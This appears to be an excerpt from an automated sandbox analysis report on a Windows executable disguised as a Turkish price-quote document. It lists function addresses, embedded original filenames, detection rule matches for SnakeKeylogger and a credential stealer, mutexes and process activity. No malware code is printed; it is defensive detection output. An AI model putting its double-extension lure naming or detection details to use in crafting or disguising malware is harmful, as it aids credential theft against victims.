Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A353B8	1_2_06A353B8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A32B18	1_2_06A32B18
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A3A0C8	1_2_06A3A0C8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A30040	1_2_06A30040
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A36AF0	1_2_06A36AF0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A34200	1_2_06A34200
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A3E3D0	1_2_06A3E3D0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A9BF10	1_2_06A9BF10
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A974A8	1_2_06A974A8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A9543F	1_2_06A9543F
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A95450	1_2_06A95450
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A94BE0	1_2_06A94BE0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A95888	1_2_06A95888
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A95018	1_2_06A95018
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A95879	1_2_06A95879
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_0131ACB8	4_2_0131ACB8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_01318470	4_2_01318470
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_013184B0	4_2_013184B0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_01315728	4_2_01315728
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_0131DF0E	4_2_0131DF0E
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2D2CA	4_2_02C2D2CA
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C25362	4_2_02C25362
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2A088	4_2_02C2A088
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2C19A	4_2_02C2C19A
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C27118	4_2_02C27118
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2C738	4_2_02C2C738
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C26498	4_2_02C26498
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2C468	4_2_02C2C468
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2D599	4_2_02C2D599
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2D869	4_2_02C2D869
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C269A0	4_2_02C269A0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2CFF7	4_2_02C2CFF7
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2EC18	4_2_02C2EC18
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2CD28	4_2_02C2CD28
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2F809	4_2_02C2F809
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2FC66	4_2_02C2FC66
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_02C2EC0A	4_2_02C2EC0A
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B97B0	4_2_059B97B0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B5290	4_2_059B5290
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B9ED8	4_2_059B9ED8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B9590	4_2_059B9590
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BF1B9	4_2_059BF1B9
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BF1C8	4_2_059BF1C8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B8DF9	4_2_059B8DF9
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BE918	4_2_059BE918
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BE917	4_2_059BE917
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B2970	4_2_059B2970
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BED70	4_2_059BED70
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BED60	4_2_059BED60
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BE4B2	4_2_059BE4B2
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BE4C0	4_2_059BE4C0
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B0011	4_2_059B0011
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BDC10	4_2_059BDC10
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BDC01	4_2_059BDC01
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B0040	4_2_059B0040
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BE068	4_2_059BE068
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BE067	4_2_059BE067
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B1B97	4_2_059B1B97
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BD7B8	4_2_059BD7B8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B1BA8	4_2_059B1BA8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BD7A8	4_2_059BD7A8
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BCF08	4_2_059BCF08
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B0B30	4_2_059B0B30
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B0B24	4_2_059B0B24
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BD360	4_2_059BD360
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B2288	4_2_059B2288
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B5280	4_2_059B5280
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BCEF7	4_2_059BCEF7
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BF610	4_2_059BF610
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B8E08	4_2_059B8E08
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BF620	4_2_059BF620
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BFA78	4_2_059BFA78
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B2278	4_2_059B2278
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059BFA6A	4_2_059BFA6A
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 4_2_059B9E69	4_2_059B9E69

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1451701321.0000000002701000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000000.1410346446.00000000003EA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameJZPm.exe< vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1449487089.000000000097E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1456154556.00000000075C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1451701321.0000000002772000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1451701321.0000000002772000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1452496590.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1455433699.0000000006DD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3874634607.0000000007129000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Binary or memory string: OriginalFilenameJZPm.exe< vs #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37cac08.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.37881e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 8084, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/6@3/3

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe.log

Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Mutant created: NULL
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Mutant created: \Sessions\1\BaseNamedObjects\aJkWabAQumJshTNauUozPY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lof0dgap.dzt.ps1

Jump to behavior

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"
